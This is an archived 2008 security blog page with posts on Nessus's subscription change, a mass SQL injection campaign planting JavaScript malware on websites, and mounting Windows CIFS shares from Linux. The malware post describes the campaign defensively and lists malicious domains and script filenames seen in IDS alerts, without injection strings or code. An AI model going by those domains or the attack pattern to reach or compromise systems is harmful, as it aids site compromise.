Archive for May, 2008

Nessus not free anymore :-(

Published by
travis
at May 23, 2008 in Uncategorized. Comments

Well that’s not entirely true, they will still offer the “engine” for free just not all of the plugins (maybe?). The current but soon to be old model had two types of subscriptions,

  1. Direct feed ($1,200 per year)
  2. Registered feed (free but plugins were 7 days old)

Come the end of July they will switch to a different model,

  1. Professional feed = Direct feed
  2. Home feed (only personal plugins, whatever that means?)

The press release was some what cryptic and I couldn’t decipher what exactly this “Home feed” will be. It could be all the plugins minus the compliance stuff but the proof is in the pudding.

So it’s a sad day but I guess we all knew this was coming. In fact I’m all for Tenable getting paid for their valuable service I just hope they don’t go the next step and raise the price of the plugins feed to something outrageous. I think $1,200 is a reasonable price especially is you’re an independent contractor like I used to be. Let’s just hope the “Professional feed” remains a reasonable price. Tenable could always introduce a 3rd tier geared towards large organizations to get even more capital, but maybe that won’t be necessary with their new model. If for some reason the 2 tier model doesn’t work I hope they will entertain the 3 tier model, I can only hope (cross fingers). They could be shooting themselves in the foot with this move, which is essentially shooting their user base in the foot as well.

I’m not a hater, I like love Nessus and think it’s bottom line the best vulnerability scanner on the market period. I remember not too long ago (~ 4 years?) when Nessus had around 1,000 plugins, now there are over 21,000 so they have definitely grown over the years. I hope this move will help them to keep growing, just don’t forget the little guy.

Widespread SQL injection & Javascript malware

Published by
travis
at May 15, 2008 in malware and SQL injection. Comments

This is the first time I have ever seen SQL injection this widespread and in an automated fashion. Before it’s all said and done this could be !!! HUGE !!!. News of this has been trickling out since the end of April with the first hint of it at the beginning of the year.

Basically what’s happening is attackers are using SQL injection, in some sort of automated fashion, to insert Javascript malware into databases of some popular websites, the United Nations for example. Once a user visits an infected website (un.org) they will unknowingly be sent to a malicious site where attackers try numerous exploits to see if they succeed. Keep in mind the user will remain on un.org as if everything is fine and dandy but in the background exploits are being launched.

What’s so scary about these widespread infections is that the Javascript malware will remain on the database until the webmaster removes it. Even then the websites will still be vulnerable to SQL injection so attackers could reinsert malware until the vulnerability is fixed. Also attackers could easily update the location of their malicious site through SQL injection. For example lets say attackers are using http://evilattacker.com for launching their exploits but this URL gets blacklisted, they could then update infected databases with a new URL, say http://maliciousattacker.com. So this type of widespread epidemic is the gift that keeps on giving.

I’ve seen these attacks come across the IDS (intrusion detection system) where users are visiting infected URL’s. Of course attackers could easily move their operations to different URL’s. Some exploit URL’s I’ve seen so far are nihaorr1.com, nmidahena.com, aspder.com, rirwow.cn, and wowyeye.cn. I performed searches to get an idea of the infection numbers, now doing a search for the offending URL won’t give you a 1 to 1 relationship but it will give you a ballpark figure. Take a look at the “Results” numbers in the following screen shots.

nihaorr1.com Infections

nmidahena.com Infections

aspder.com Infections

Also check out this screen shot from ririwow.cn, you’ll get a laugh from it.

ririwow.cn

So the ballpark infection just from these three URL’s is 500,000, scary isn’t it. Even if this number is 400,000 off that still leaves 100,000 sites infected. There’s no way at this point to verify the number but this is definitely the largest SQL injection campaign I have ever seen. It’s these URL’s along with others that are hosting the Javascript malware. It’s common to see the attackers use Javascript to open zero pixel iframes so the attack appears hidden. The Javascript files I’ve seen so far are short names with either a single letter or number (e.g. m.js, 1.js, jp.js, etc). So the request that happens in the background will look like http://ririwow.cn/jp.js. In order to see the request one would have to use a local web proxy. Without a proxy you would never see the request. So I’m going to keep my eyes peeled in the coming months to see how this epidemic plays out.

Below are some other good articles related to this topic

Internet Storm Center

Websense

ShadowServer

CIFS, Linux, & Windows

Published by
travis
at May 13, 2008 in linux. Comments

I connect to Windows from Linux on almost a daily basis so I wanted to let others know how I connect the two OSes. There are some articles out there that will explain how to access Windows shares from Linux but they don’t explain things as simply as I would like. So first of all there are 2 common ways to connect to a Windows share from Linux.

  1. mount cifs or mount smbfs
  2. smbclient

I prefer the “mount cifs” option because smbfs is no longer supported and smbclient gives you the awkward command prompt look and feel like ftp via the command line. An example of how you would connect to a share via “mount cifs” can be seen below.

prompt:~$ mount -t cifs //machine/folder /mnt/windows -o username=travis

Keep in mind “machine” = machine name and “folder” = shared folder. Also I created the “windows” directory inside the “mnt” directory so that I would have a mount point. If the directory requires authentication you will be prompted for a password. In a medium to large organization this will more than likely be your Active Directory username and password. I’ve been using CIFS since 2007 and I’m never going back to smbfs or smbclient. I know CIFS has been around a while and I’m some what behind the times but I didn’t have a real need for it until last year. CIFS was definitely one of my top finds of last year. If anyone knows of a better solution please hit me up.

================ FYI ================

  • Windows uses the CIFS protocol to share folders
  • You may see it referred to as CIFS/SMB
  • Samba is a free implementation of SMB (both client and server)
  • Smbclient is a client program that comes with the Samba suite
  • CIFS is the latest “variant” of the SMB protocol
  • CIFS/SMB is probably the majority of network traffic in an organization (Windows environment that is)